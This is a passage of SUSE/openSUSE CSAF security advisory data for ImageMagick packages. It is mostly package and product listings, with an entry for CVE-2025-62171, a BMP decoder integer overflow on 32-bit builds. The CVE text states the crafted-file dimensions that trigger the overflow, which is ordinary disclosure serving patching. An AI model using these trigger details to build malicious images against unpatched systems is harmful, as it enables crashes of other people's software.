"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-devel-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-devel-32bit-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "ImageMagick-extra-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "ImageMagick-extra-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagick++-devel-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagick++-devel-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagick++-devel-32bit-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.0.9-150400.6.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.x86_64",
"product": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.46.1.x86_64",
"product_id": "perl-PerlMagick-7.1.0.9-150400.6.46.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-desktop-applications:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-desktop-applications:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-62171",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62171"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62171",
"url": "https://www.suse.com/security/cve/CVE-2025-62171"
},
{
"category": "external",
"summary": "SUSE Bug 1252282 for CVE-2025-62171",
"url": "https://bugzilla.suse.com/1252282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.46.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-10-27T07:58:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-62171"
}
]
}
opensuse-su-2025:15650-1
Vulnerability from csaf_opensuse
Published
2025-10-21 00:00
Modified
2025-10-21 00:00
Summary
ImageMagick-7.1.2.7-1.1 on GA media
Notes
Title of the patch
ImageMagick-7.1.2.7-1.1 on GA media
Description of the patch
These are all security issues fixed in the ImageMagick-7.1.2.7-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15650
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "ImageMagick-7.1.2.7-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the ImageMagick-7.1.2.7-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15650",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15650-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62171/"
}
],
"title": "ImageMagick-7.1.2.7-1.1 on GA media",
"tracking": {
"current_release_date": "2025-10-21T00:00:00Z",
"generator": {
"date": "2025-10-21T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15650-1",
"initial_release_date": "2025-10-21T00:00:00Z",
"revision_history": [
{
"date": "2025-10-21T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-devel-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-devel-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-devel-32bit-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-doc-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-doc-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.7-1.1.aarch64",
"product": {
"name": "ImageMagick-extra-7.1.2.7-1.1.aarch64",
"product_id": "ImageMagick-extra-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagick++-devel-7.1.2.7-1.1.aarch64",
"product_id": "libMagick++-devel-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.aarch64",
"product_id": "libMagick++-devel-32bit-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.7-1.1.aarch64",
"product": {
"name": "perl-PerlMagick-7.1.2.7-1.1.aarch64",
"product_id": "perl-PerlMagick-7.1.2.7-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-devel-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-devel-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-devel-32bit-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-doc-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-doc-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"product": {
"name": "ImageMagick-extra-7.1.2.7-1.1.ppc64le",
"product_id": "ImageMagick-extra-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagick++-devel-7.1.2.7-1.1.ppc64le",
"product_id": "libMagick++-devel-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le",
"product_id": "libMagick++-devel-32bit-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"product": {
"name": "perl-PerlMagick-7.1.2.7-1.1.ppc64le",
"product_id": "perl-PerlMagick-7.1.2.7-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-devel-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-devel-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-devel-32bit-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-doc-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-doc-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.7-1.1.s390x",
"product": {
"name": "ImageMagick-extra-7.1.2.7-1.1.s390x",
"product_id": "ImageMagick-extra-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x",
"product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagick++-devel-7.1.2.7-1.1.s390x",
"product_id": "libMagick++-devel-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagick++-devel-32bit-7.1.2.7-1.1.s390x",
"product_id": "libMagick++-devel-32bit-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"product": {
"name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x",
"product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.7-1.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-7.1.2.7-1.1.s390x",
"product": {
"name": "perl-PerlMagick-7.1.2.7-1.1.s390x",
"product_id": "perl-PerlMagick-7.1.2.7-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-config-7-SUSE-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-devel-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-devel-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-devel-32bit-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-doc-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-doc-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-doc-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-7.1.2.7-1.1.x86_64",
"product": {
"name": "ImageMagick-extra-7.1.2.7-1.1.x86_64",
"product_id": "ImageMagick-extra-7.1.2.7-1.1.x86_64"
}
},
{
"category": "product_version",
